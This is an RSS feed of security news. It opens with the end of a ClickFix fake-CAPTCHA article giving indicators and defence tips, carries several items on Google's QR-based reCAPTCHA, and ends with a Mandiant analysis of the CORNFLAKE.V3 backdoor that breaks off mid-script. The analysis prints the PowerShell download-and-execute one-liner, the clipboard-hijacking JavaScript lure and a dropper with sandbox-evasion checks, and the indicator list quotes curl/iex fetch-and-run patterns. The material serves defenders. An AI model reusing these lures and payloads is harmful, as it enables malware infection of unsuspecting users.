makes deployment trivial for anyone with basic computer knowledge</li><li><strong>IP blocking built in: </strong>Blocks security researchers from analyzing the page, extending how long the attack stays live</li></ol><p><strong>08 Indicators of Compromise (IOCs)</strong></p><p>If you encounter any of the following warning signs while browsing, close the browser tab immediately and do not follow any instructions on the page:</p><p><strong>i) Behavior:</strong><br>• Any website asking you to open PowerShell, Terminal, or the Run dialog<br>• CAPTCHA page instructing you to press Windows Key + R or Ctrl + Alt + T <br>• The verification page asks you to paste a command and press Enter <br>• Cloudflare or Google verification on an unfamiliar or suspicious website</p><p><strong>ii) Command Pattern:<br></strong>• curl [URL] -o [file].sh &amp;&amp; chmod +x [file].sh &amp;&amp; ./[file].sh <br>• powershell -enc [Base64 string] or iex(iwr [URL])</p><p><strong>iii) Infrastructure:<br></strong>• Pages hosted on free VPS or unfamiliar domains using Cloudflare branding</p><p><strong>09 How to Protect Yourself</strong></p><p>The good news is that ClickFix attacks are <strong>completely preventable</strong>. Since they rely entirely on the victim taking a deliberate action, knowing what to look for is your complete defense.</p><p><strong>1. Never Run Commands from Websites: </strong>No legitimate website ever needs you to open your terminal or PowerShell. This is a universal rule with zero exceptions.</p><p><strong>2. Verify CAPTCHA Carefully: </strong>Real Cloudflare and Google CAPTCHA never ask you to run commands. If a CAPTCHA asks this, it is 100% fake; close the tab.</p><p><strong>3. Check Your Clipboard First: </strong>If a website makes you click something, paste it into Notepad first before pasting anywhere else. See exactly what was copied.</p><p><strong>4. Keep Security Software Updated: </strong>While ClickFix bypasses many AV tools, updated endpoint protection can still catch known payload signatures after execution begins.</p><p><strong>5. Use a Non-Admin Account Daily: </strong>Running under a standard (non-administrator) account limits what malware can do, even if it gets executed on your device.</p><p><strong>6. Educate Your Team: </strong>ClickFix specifically targets non-technical users who trust CAPTCHA pages instinctively. Share this article with your team.</p><p><strong>The one rule that prevents 100% of ClickFix attacks:</strong> Never open a terminal or command prompt because a website told you to. No legitimate service, not Cloudflare, not Google, not Microsoft, will ever ask you to do this. Ever.</p><p><strong>10</strong> <strong>Conclusion</strong></p><p>The ClickFix attack is a masterclass in social engineering. It requires no zero-day exploits, no sophisticated malware delivery chain, and no technical skill from the attacker. It simply requires that a victim trusts a CAPTCHA and follows instructions. What makes it especially alarming is the availability of ready-made builder tools that package this entire attack into a point-and-click interface. Anyone with a VPS and five minutes can deploy a convincing fake verification page capable of delivering ransomware, info stealers, or remote access trojans to victims worldwide. At ThreatWatch360, we believe education is the most powerful cybersecurity tool available. The entire ClickFix attack chain breaks the moment a potential victim knows one simple rule: legitimate websites never ask you to run terminal commands.</p><p><strong>If you suspect your organization is being targeted by ClickFix or similar social engineering attacks, visit </strong><a href="https://threatwatch360.com/"><strong>ThreatWatch360</strong></a><strong> to get a brand risk assessment and real-time threat monitoring for your domain.</strong></p><img src="https://medium.com/_/stat?event=post.clientViewed&amp;referrerSource=full_rss&amp;postId=95edada96553" width="1" height="1" alt=""><hr><p><a href="https://infosecwriteups.com/clickfix-attack-exposed-how-fake-captcha-delivers-malware-95edada96553">ClickFix Attack Exposed: How Fake CAPTCHA Delivers Malware</a> was originally published in <a href="https://infosecwriteups.com/">InfoSec Write-ups</a> on Medium, where people are continuing the conversation by highlighting and responding to this story.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Google’s New reCAPTCHA QR System Locks Out Privacy-Focused Android Users]]></title>
<description><![CDATA[Google has rolled out a new security system called Cloud Fraud Defense, the next version of reCAPTCHA. Now, instead of picture puzzles, you get a QR code when a site wants to make sure you’re not a robot. However, this change is actually a problem for folks using privacy-focused Android phones. I...]]></description>
<link>https://tsecurity.de/de/3507855/it-security-nachrichten/googles-new-recaptcha-qr-system-locks-out-privacy-focused-android-users/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3507855/it-security-nachrichten/googles-new-recaptcha-qr-system-locks-out-privacy-focused-android-users/</guid>
<pubDate>Mon, 11 May 2026 19:10:24 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Google has rolled out a new security system called Cloud Fraud Defense, the next version of reCAPTCHA. Now, instead of picture puzzles, you get a QR code when a site wants to make sure you’re not a robot. However, this change is actually a problem for folks using privacy-focused Android phones. If you ditched Google […]</p>
<p>The post <a href="https://privacysavvy.com/news/cybersecurity/google-recaptcha-qr-locks-out-privacy-android-users/">Google’s New reCAPTCHA QR System Locks Out Privacy-Focused Android Users</a> appeared first on <a href="https://privacysavvy.com/">PrivacySavvy</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Google’s new reCAPTCHA system restricts access to the open web]]></title>
<description><![CDATA[Google’s latest reCAPTCHA changes are drawing backlash from privacy advocates and developers of alternative mobile operating systems, who argue the system effectively locks users out of websites unless they use Google-approved devices and software. The controversy centers on Google’s new “Cloud F...]]></description>
<link>https://tsecurity.de/de/3507330/it-security-nachrichten/googles-new-recaptcha-system-restricts-access-to-the-open-web/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3507330/it-security-nachrichten/googles-new-recaptcha-system-restricts-access-to-the-open-web/</guid>
<pubDate>Mon, 11 May 2026 16:11:43 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Google’s latest reCAPTCHA changes are drawing backlash from privacy advocates and developers of alternative mobile operating systems, who argue the system effectively locks users out of websites unless they use Google-approved devices and software. The controversy centers on Google’s new “Cloud Fraud Defense” platform, announced during the company’s Cloud Next event held on April 22–23, …</p>
<p>The post <a href="https://cyberinsider.com/googles-new-recaptcha-system-restricts-access-to-the-open-web/">Google’s new reCAPTCHA system restricts access to the open web</a> appeared first on <a href="https://cyberinsider.com/">CyberInsider</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Google reCAPTCHA Update Blocks Privacy-Focused Android Users From Sites]]></title>
<description><![CDATA[Google has rolled out a significant update to its reCAPTCHA verification system that fundamentally alters how websites verify human traffic. Announced on April 22 at the Google Cloud Next 2026 conference, the new mechanism operates through Google’s Cloud Fraud Defense…
Read more →
The post Google...]]></description>
<link>https://tsecurity.de/de/3506454/it-security-nachrichten/google-recaptcha-update-blocks-privacy-focused-android-users-from-sites/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3506454/it-security-nachrichten/google-recaptcha-update-blocks-privacy-focused-android-users-from-sites/</guid>
<pubDate>Mon, 11 May 2026 11:40:36 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Google has rolled out a significant update to its reCAPTCHA verification system that fundamentally alters how websites verify human traffic. Announced on April 22 at the Google Cloud Next 2026 conference, the new mechanism operates through Google’s Cloud Fraud Defense…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/google-recaptcha-update-blocks-privacy-focused-android-users-from-sites/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/google-recaptcha-update-blocks-privacy-focused-android-users-from-sites/">Google reCAPTCHA Update Blocks Privacy-Focused Android Users From Sites</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Neues reCAPTCHA von Google, Probleme mit Mobilgeräten ohne iOS und Android?]]></title>
<description><![CDATA[Die bei vielen Webseiten erforderlichen reCAPTCHA-Rätsel zur SPAM-Abwehr will Google durch ein neues System mit QR-Codes ablösten. Dieses System setzt aber ein Android mit Google Play Services oder iOS von Apple voraus. Dieser Ansatz könnte für Benutzer, die kein Mobilgerät … Weiterlesen →
Quelle]]></description>
<link>https://tsecurity.de/de/3506437/it-nachrichten/neues-recaptcha-von-google-probleme-mit-mobilgeraeten-ohne-ios-und-android/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3506437/it-nachrichten/neues-recaptcha-von-google-probleme-mit-mobilgeraeten-ohne-ios-und-android/</guid>
<pubDate>Mon, 11 May 2026 11:33:51 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Die bei vielen Webseiten erforderlichen reCAPTCHA-Rätsel zur SPAM-Abwehr will Google durch ein neues System mit QR-Codes ablösten. Dieses System setzt aber ein Android mit Google Play Services oder iOS von Apple voraus. Dieser Ansatz könnte für Benutzer, die kein Mobilgerät … <a href="https://borncity.com/blog/2026/05/11/neues-recaptcha-von-google-probleme-mit-mobilgeraeten-ohne-ios-und-android/">Weiterlesen <span class="meta-nav">→</span></a>
<p><a href="https://borncity.com/blog/2026/05/11/neues-recaptcha-von-google-probleme-mit-mobilgeraeten-ohne-ios-und-android/" rel="nofollow">Quelle</a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Google reCAPTCHA Update Blocks Privacy-Focused Android Users From Sites]]></title>
<description><![CDATA[Google has rolled out a significant update to its reCAPTCHA verification system that fundamentally alters how websites verify human traffic. Announced on April 22 at the Google Cloud Next 2026 conference, the new mechanism operates through Google’s Cloud Fraud Defense tool and introduces a mandat...]]></description>
<link>https://tsecurity.de/de/3506358/it-security-nachrichten/google-recaptcha-update-blocks-privacy-focused-android-users-from-sites/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3506358/it-security-nachrichten/google-recaptcha-update-blocks-privacy-focused-android-users-from-sites/</guid>
<pubDate>Mon, 11 May 2026 11:11:49 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Google has rolled out a significant update to its reCAPTCHA verification system that fundamentally alters how websites verify human traffic. Announced on April 22 at the Google Cloud Next 2026 conference, the new mechanism operates through Google’s Cloud Fraud Defense tool and introduces a mandatory QR code challenge for suspicious traffic. While designed to combat […]</p>
<p>The post <a href="https://cybersecuritynews.com/google-recaptcha-update/">Google reCAPTCHA Update Blocks Privacy-Focused Android Users From Sites</a> appeared first on <a href="https://cybersecuritynews.com/">Cyber Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[QR statt Captcha: Googles KI-Abwehr blockiert freie Android-Handys]]></title>
<description><![CDATA[Googles neues Recaptcha-System zur Abwehr von KI-Bots sorgt für Probleme bei alternativen Android-Versionen. Da die Verifizierung per QR-Code zwingend die offiziellen Play Services voraussetzt, werden Nutzer von Systemen wie LineageOS im Netz blockiert.			(Weiter lesen)]]></description>
<link>https://tsecurity.de/de/3506135/it-security-nachrichten/qr-statt-captcha-googles-ki-abwehr-blockiert-freie-android-handys/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3506135/it-security-nachrichten/qr-statt-captcha-googles-ki-abwehr-blockiert-freie-android-handys/</guid>
<pubDate>Mon, 11 May 2026 09:54:29 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<a href="https://winfuture.de/news,158621.html"><img hspace="5" border="0" align="left" alt="Logo, Captcha, Recaptcha, Captchas, v3" width="1920" height="1080" src="https://i.wfcdn.de/teaser/1920/57379.jpg"></a>
			Googles neues Recaptcha-System zur Abwehr von KI-Bots sorgt für Probleme bei alternativen <a href="https://winfuture.de/special/android/" title="Android Special">Android-Versionen</a>. Da die Verifizierung per QR-Code zwingend die offiziellen Play Services voraussetzt, werden Nutzer von Systemen wie LineageOS im Netz blockiert.			(<a href="https://winfuture.de/news,158621.html">Weiter lesen</a>)]]></content:encoded>
</item>
<item>
<title><![CDATA[reCAPTCHA per QR-Code und Google-Pflicht]]></title>
<description><![CDATA[reCAPTCHA per QR-Code und Google-Pflicht

      
      
        
          
            
                



            
          
        
              
    
  Daniel Richey
Mo., 11.05.2026 - 08:15


            Google löst Captcha-Rätsel durch QR-Codes ab – und macht Google Play Services zur...]]></description>
<link>https://tsecurity.de/de/3505968/server/recaptcha-per-qr-code-und-google-pflicht/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3505968/server/recaptcha-per-qr-code-und-google-pflicht/</guid>
<pubDate>Mon, 11 May 2026 08:30:36 +0200</pubDate>
<category>🐧 Server</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<span class="field field--name-title field--type-string field--label-hidden">reCAPTCHA per QR-Code und Google-Pflicht</span>

      <div class="field field--name-field-image field--type-image field--label-hidden field__items">
      <div class="images-container clearfix">
        <div class="image-preview clearfix">
          <div class="image-wrapper clearfix">
            <div class="field__item">
                <a class="image-popup overlayed" href="https://www.it-administrator.de/recaptcha-google-qr-code-bots-phishing"><img loading="lazy" src="https://www.it-administrator.de/sites/default/files/styles/medium/public/Google-reCaptcha-QR.jpg?itok=7qhtp9kq" width="480" height="319" alt="Googles neues reCAPTCHA unterbricht den Checkout-Prozess eines Online-Shops mit einem modalen Dialogfenster, das Nutzer auffordert, einen QR-Code mit dem Smartphone zu scannen, um ihre Identität als Mensch zu bestätigen." title="So sieht Googles neues reCAPTCHA in der Praxis aus: Statt ein Rätsel zu lösen, sollen Nutzer beim Checkout einen QR-Code mit dem Smartphone scannen - vorausgesetzt, das Gerät erfüllt die technischen Voraussetzungen. (Quelle: Google.com)" typeof="foaf:Image" class="image-style-medium">

<span class="overlay"><i class="fa fa-plus"></i></span></a>

            </div>
          </div>
        </div>
              </div>
    </div>
  <span class="field field--name-uid field--type-entity-reference field--label-hidden"><a title="Benutzerprofil anzeigen." href="https://www.it-administrator.de/user/104" lang about="https://www.it-administrator.de/user/104" typeof="schema:Person" property="schema:name" datatype class="username">Daniel Richey</a></span>
<span class="field field--name-created field--type-created field--label-hidden"><time datetime="2026-05-11T08:15:20+02:00" title="Montag, Mai 11, 2026 - 08:15" class="datetime">Mo., 11.05.2026 - 08:15</time>
</span>

            <div class="clearfix text-formatted field field--name-body field--type-text-with-summary field--label-hidden field__item">Google löst Captcha-Rätsel durch QR-Codes ab – und macht Google Play Services zur stillen Pflicht. Wer bewusst auf Smartphones ohne Google-Dienste setzt, scheitert künftig womöglich schon Aufruf bestimmter Webseiten. Und Betrüger dürften aufhorchen.</div>
      <div class="field field--name-field-mt-post-categories field--type-entity-reference field--label-hidden field--entity-reference-target-type-taxonomy-term clearfix">
    <ul class="links field__items">
          <li><a href="https://www.it-administrator.de/news" hreflang="en">News</a></li>
      </ul>
</div>  <div class="node__links">
    <ul class="links inline"><li class="node-readmore"><a href="https://www.it-administrator.de/recaptcha-google-qr-code-bots-phishing" rel="tag" title="reCAPTCHA per QR-Code und Google-Pflicht" hreflang="en">Weiterlesen<span class="visually-hidden"> über reCAPTCHA per QR-Code und Google-Pflicht</span></a></li></ul>  </div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Neuer Bot-Test schließt Android-Nutzer ohne Google-Dienste aus]]></title>
<description><![CDATA[Google hat die neue Stufe seines Bot-Tests reCAPTCHA auf Android an Google Play Services 25.41.30 oder neuer gebunden. Bei verdächtigem Verhalten zeigt das System statt…
Dieser Artikel Neuer Bot-Test schließt Android-Nutzer ohne Google-Dienste aus erschien zuerst auf SmartDroid.de.]]></description>
<link>https://tsecurity.de/de/3505728/android-tipps/neuer-bot-test-schliesst-android-nutzer-ohne-google-dienste-aus/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3505728/android-tipps/neuer-bot-test-schliesst-android-nutzer-ohne-google-dienste-aus/</guid>
<pubDate>Mon, 11 May 2026 06:07:46 +0200</pubDate>
<category>🤖 Android Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<img width="2048" height="1282" src="https://i0.wp.com/www.smartdroid.de/wp-content/uploads/2026/04/Android-Hero-scaled.jpg?fit=2048%2C1282&amp;ssl=1" class="attachment-medium size-medium wp-post-image" alt="Android Hero" decoding="async" fetchpriority="high" srcset="https://i0.wp.com/www.smartdroid.de/wp-content/uploads/2026/04/Android-Hero-scaled.jpg?w=2048&amp;ssl=1 2048w, https://i0.wp.com/www.smartdroid.de/wp-content/uploads/2026/04/Android-Hero-scaled.jpg?resize=1200%2C751&amp;ssl=1 1200w, https://i0.wp.com/www.smartdroid.de/wp-content/uploads/2026/04/Android-Hero-scaled.jpg?resize=1536%2C961&amp;ssl=1 1536w, https://i0.wp.com/www.smartdroid.de/wp-content/uploads/2026/04/Android-Hero-scaled.jpg?w=1800&amp;ssl=1 1800w" sizes="(max-width: 2048px) 100vw, 2048px"><p>Google hat die neue Stufe seines Bot-Tests reCAPTCHA auf Android an Google Play Services 25.41.30 oder neuer gebunden. Bei verdächtigem Verhalten zeigt das System statt…</p>
<p>Dieser Artikel <a rel="nofollow" href="https://www.smartdroid.de/neuer-bot-test-schliesst-android-nutzer-ohne-google-dienste-aus/">Neuer Bot-Test schließt Android-Nutzer ohne Google-Dienste aus</a> erschien zuerst auf <a rel="nofollow" href="https://www.smartdroid.de/">SmartDroid.de</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Googles neues reCAPTCHA: Mögliche Hürde für Google-freie Android-Varianten]]></title>
<description><![CDATA[Googles neues reCAPTCHA-System erfordert bei Android-Systemen Play-Dienste. Das könnte für google-freie Varianten zum Problem werden.]]></description>
<link>https://tsecurity.de/de/3504689/it-nachrichten/googles-neues-recaptcha-moegliche-huerde-fuer-google-freie-android-varianten/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3504689/it-nachrichten/googles-neues-recaptcha-moegliche-huerde-fuer-google-freie-android-varianten/</guid>
<pubDate>Sun, 10 May 2026 14:17:41 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Googles neues reCAPTCHA-System erfordert bei Android-Systemen Play-Dienste. Das könnte für google-freie Varianten zum Problem werden.]]></content:encoded>
</item>
<item>
<title><![CDATA[A Cereal Offender: Analyzing the CORNFLAKE.V3 Backdoor]]></title>
<description><![CDATA[Written by: Marco Galli

Welcome to the Frontline Bulletin Series
Straight from Mandiant Threat Defense, the "Frontline Bulletin" series brings you the latest on the most intriguing compromises we are seeing in the wild right now, equipping our community to understand and respond to the most comp...]]></description>
<link>https://tsecurity.de/de/3504173/it-security-nachrichten/a-cereal-offender-analyzing-the-cornflakev3-backdoor/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3504173/it-security-nachrichten/a-cereal-offender-analyzing-the-cornflakev3-backdoor/</guid>
<pubDate>Sun, 10 May 2026 08:09:29 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div class="block-paragraph_advanced"><p>Written by: Marco Galli</p>
<hr></div>
<div class="block-paragraph_advanced"><h3><span>Welcome to the Frontline Bulletin Series</span></h3>
<p><span>Straight from </span><a href="https://cloud.google.com/security/products/mandiant-managed-threat-hunting"><span>Mandiant Threat Defense</span></a><span>, the "Frontline Bulletin" series brings you the latest on the most intriguing compromises we are seeing in the wild right now, equipping our community to understand and respond to the most compelling threats we observe. This edition dissects an infection involving two threat groups, UNC5518 and UNC5774, leading to the deployment of CORNFLAKE.V3.</span></p>
<h3><span>Introduction</span></h3>
<p><span>Since June 2024, Mandiant Threat Defense has been tracking UNC5518, a financially motivated threat cluster compromising legitimate websites to serve fake CAPTCHA verification pages. This deceptive technique, known as </span><code>ClickFix</code><span>, lures website visitors into executing a downloader script which initiates a malware infection chain. UNC5518 appears to partner with clients or affiliates who use access obtained by the group to deploy additional malware.</span></p>
<p><span>While the initial compromise and fake CAPTCHA deployment are orchestrated by UNC5518, the payloads served belong to other threat groups. UNC5518 utilizes downloader scripts that function as an access-as-a-service. Several distinct threat actors have been observed leveraging the access provided by UNC5518, including:</span></p>
<ul>
<li aria-level="1">
<p role="presentation"><span>UNC5774: A financially motivated group known to use CORNFLAKE backdoor to deploy a variety of subsequent payloads.</span></p>
</li>
<li aria-level="1">
<p role="presentation"><span>UNC4108: A threat cluster with unknown motivation, observed using PowerShell to deploy various tools like VOLTMARKER and NetSupport RAT, and conducting reconnaissance.</span></p>
</li>
</ul>
<p><span>This blog post details a campaign where Mandiant identified UNC5518 deploying a downloader that delivers CORNFLAKE.V3 malware. Mandiant attributes the CORNFLAKE.V3 samples to UNC5774, a distinct financially motivated actor that uses UNC5518's access-as-a-service operation as an entry vector into target environments.</span></p>
<h3><span>The CORNFLAKE Family</span></h3>
<p><span>CORNFLAKE.V3 is a backdoor, observed as two variants, written in JavaScript or PHP (PHP Variant</span><span>) that retrieves payloads via HTTP. Supported payload types include shell commands, executables and dynamic link libraries (DLLs). Downloaded payloads are written to disk and executed. CORNFLAKE.V3 collects basic system information and sends it to a remote server via HTTP. CORNFLAKE.V3 has also been observed abusing Cloudflare Tunnels to proxy traffic to remote servers.</span></p>
<p><span>CORNFLAKE.V3 is an updated version of CORNFLAKE.V2, sharing a significant portion of its codebase. Unlike V2, which functioned solely as a downloader, V3 features host persistence via a registry Run key, and supports additional payload types.</span></p>
<p><span>The original CORNFLAKE malware differed significantly from later iterations, as it was written in C. This first variant functioned as a downloader, gathering basic system information and transmitting it via TCP to a remote server. Subsequently, it would download and execute a payload.</span></p></div>
<div class="block-paragraph_advanced"><div align="left">
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div>
<div><table><colgroup><col><col><col><col></colgroup>
<tbody>
<tr>
<td>
<p><strong>Malware Family</strong></p>
</td>
<td>
<p><strong>CORNFLAKE</strong></p>
</td>
<td>
<p><strong>CORNFLAKE.V2</strong></p>
</td>
<td>
<p><strong>CORNFLAKE.V3</strong></p>
</td>
</tr>
<tr>
<td>
<p><strong>Language</strong></p>
</td>
<td>
<p><span>C</span></p>
</td>
<td>
<p><span>JS</span></p>
</td>
<td>
<p><span>JS or PHP</span></p>
</td>
</tr>
<tr>
<td>
<p><strong>Type</strong></p>
</td>
<td>
<p><span>Downloader</span></p>
</td>
<td>
<p><span>Downloader</span></p>
</td>
<td>
<p><span>Backdoor</span></p>
</td>
</tr>
<tr>
<td>
<p><strong>C2 Communication</strong></p>
</td>
<td>
<p><span>TCP socket (XOR encoded)</span></p>
</td>
<td>
<p><span>HTTP (XOR encoded)</span></p>
</td>
<td>
<p><span>HTTP (XOR encoded)</span></p>
</td>
</tr>
<tr>
<td>
<p><strong>Payload types</strong></p>
</td>
<td>
<p><span>DLL</span></p>
</td>
<td>
<p><span>DLL,EXE,JS,BAT</span></p>
</td>
<td>
<p><span>DLL,EXE,JS,BAT,PS</span></p>
</td>
</tr>
<tr>
<td>
<p><strong>Persistence</strong></p>
</td>
<td>
<p><span>No</span></p>
</td>
<td>
<p><span>No</span></p>
</td>
<td>
<p><span>Registry Run key</span></p>
</td>
</tr>
</tbody>
</table></div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
<div><span>Table 1: Comparison of CORNFLAKE malware variants</span></div>
</div></div>
<div class="block-image_full_width">






  
    <div class="article-module h-c-page">
      <div class="h-c-grid">
  

    <figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      ">

      
      
        
        <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/cornflake-fig1.max-1000x1000.jpg" alt="The observed CORNFLAKE.V3 (Node.js) attack lifecycle">
        
        
      
        <figcaption class="article-image__caption "><p data-block-key="2bogi">Figure 1: The observed CORNFLAKE.V3 (Node.js) attack lifecycle</p></figcaption>
      
    </figure>

  
      </div>
    </div>
  




</div>
<div class="block-paragraph_advanced"><h3><span>Initial Lead</span></h3>
<p><span>Mandiant Threat Defense responded to suspicious PowerShell activity on a host resulting in the deployment of the CORNFLAKE.V3 backdoor.</span></p>
<p><span>Mandiant observed that a PowerShell script was executed via the Run command using the </span><code>Windows+R</code> <span>shortcut. Evidence of this activity was found in the </span><code>HKEY_USERS\User\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\RunMRU</code><span> registry key, containing the following entry which resulted in the download and execution of the next payload:</span></p></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>Name: a
Value: powershell -w h -c 
"$u=[int64](([datetime]::UtcNow-[datetime]'1970-1-1').TotalSeconds)-band 
0xfffffffffffffff0;irm 138.199.161[.]141:8080/$u|iex"\1</code></pre></div>
<div class="block-paragraph_advanced"><p><span>The </span><code>RunMRU</code> <span>registry key stores the history of commands entered into the Windows </span><code>Run</code><span> (shortcut </span><code>Windows+R</code><span>) dialog box.</span></p>
<p><span>The execution of malicious scripts using the </span><code>Windows+R</code><span> shortcut is often indicative of users who have fallen victim to ClickFix lure pages. Users typically land on such pages as a result of benign browsing leading to interaction with search results that employ SEO poisoning or malicious ads.</span></p></div>
<div class="block-image_full_width">






  
    <div class="article-module h-c-page">
      <div class="h-c-grid">
  

    <figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      ">

      
      
        
        <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/cornflake-fig2.max-1000x1000.png" alt="Fake CAPTCHA verification (ClickFix) on an attacker-controlled webpage">
        
        
      
        <figcaption class="article-image__caption "><p data-block-key="9j1oq">Figure 2: Fake CAPTCHA verification (ClickFix) on an attacker-controlled webpage</p></figcaption>
      
    </figure>

  
      </div>
    </div>
  




</div>
<div class="block-paragraph_advanced"><p><span>As seen in the Figure 2, the user was lured into pasting a hidden script into the Windows Run dialog box which was automatically copied to the clipboard by the malicious web page when the user clicked on the image. The webpage accomplished this with the following JavaScript code:</span></p></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>// An image with the reCAPTCHA logo is displayed on the webpage
&lt;div class="c" id="j"&gt;
  &lt;img src="https://www.gstatic[.]com/recaptcha/api2/logo_48.png" 
alt="reCAPTCHA Logo"&gt;
  &lt;span&gt;I'm not a robot&lt;/span&gt;
&lt;/div&gt;

// The malicious script is saved in variable _0xC
var _0xC = "powershell -w h -c 
"$u=[int64](([datetime]::UtcNow-[datetime]'1970-1-1').TotalSeconds)-band 
0xfffffffffffffff0;irm 138.199.161[.]141:8080/$u|iex"\1";

// When the image is clicked, the script is copied to the clipboard
document.getElementById("j").onclick = function(){ 
var ta = document.createElement("textarea");
ta.value = _0xC;
document.body.appendChild(ta);
ta.select();
document.execCommand("copy");</code></pre></div>
<div class="block-paragraph_advanced"><p><span>The PowerShell command copied to clipboard is designed to download and execute a script from the remote server </span><code>138.199.161[.]141:8080/$u</code><span>, where </span><code>$u</code><span> </span><span>indicates the UNIX epoch timestamp of the download.</span></p>
<p><span>As a result, the PowerShell process connects to the aforementioned IP address and port with URL path </span><code>1742214432</code> <span>(UNIX epoch timestamp), as shown in the following HTTP GET request:</span></p></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code>GET /1742214432 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) 
WindowsPowerShell/5.1.19041.5486
Host: 138.199.161[.\]141:8080
Connection: Keep-Alive</code></pre></div>
<div class="block-paragraph_advanced"><p><span>The following PowerShell dropper script, similar to </span><code>1742214432</code><span>,</span><span> was recovered from a threat-actor controlled server during the investigation of a similar CORNFLAKE.V3 compromise:</span></p></div>
<div class="block-paragraph_advanced"><pre class="language-plain"><code># Get computer manufacturer for evasion check.
$Manufacturer = Get-WmiObject Win32_ComputerSystem | Select-Object 
-ExpandProperty Manufacturer
# Exit if running in QEMU (VM detection).
if ($Manufacturer -eq "QEMU") {
    exit 0;
}

# Get memory info for evasion check.
$TotalMemoryGb = 
(Get-CimInstance Win32_ComputerSystem).TotalPhysicalMemory / 1GB
$AvailableMemoryGb = 
(Get-CimInstance Win32_OperatingSystem).FreePhysicalMemory / 1MB 
$UsedMemoryGb = $TotalMemoryGb - $AvailableMemoryGb 
# Exit if total memory is low or calculated "used" memory is low 
(possible sandbox detection).
if ($TotalMemoryGb -lt 4 -or $UsedMemoryGb -lt 1.5) {
    exit 0
}
# Exit if computer name matches default pattern 
(possible sandbox detection).
if ($env:COMPUTERNAME -match "DESKTOP-S*") {
    exit 0
}

# Pause execution briefly.
sleep 1

# Define download URL (defanged).
$ZipURL = "hxxps://nodejs[.]org/dist/v22.11.0/node-v22.11.0-win-x64.zip"
# Define destination folder (AppData).
$DestinationFolder = [System.IO.Path]::Combine($env:APPDATA, "")
# Define temporary file path for download.
$ZipFile = [System.IO.Path]::Combine($env:TEMP, "downloaded.zip")

# Download the Node.js zip file.
iwr -Uri $ZipURL -OutFile $ZipFile

# Try block for file extraction using COM objects.
try {
	$Shell = New-Object -ComObject Shell.Application
	$ZIP = $Shell.NameSpace($ZipFile)
	$Destination = $Shell.NameSpace($DestinationFolder)
	# Copy/extract contents silently.
	$Destination.CopyHere($ZIP.Items(), 20)
}
# Exit on any extraction error.
catch {
	exit 0
}

# Update destination path to the extracted Node.js folder.
$DestinationFolder = [System.IO.Path]::Combine($DestinationFolder, 
"node-v22.11.0-win-x64")
# Base64 encoded payload (large blob containing the CORNFLAKE.V3 sample).
$BASE64STRING =&lt;Base-64 encoded CORNFLAKE.V3 sample&gt;
# Decode the Base64 string.
$BINARYDATA = [Convert]::FromBase64String($BASE64STRING)
# Convert decoded bytes to a string (the payload code).
$StringData = [System.Text.Encoding]::UTF8.GetString($BINARYDATA)
# Path to the extracted node.exe.
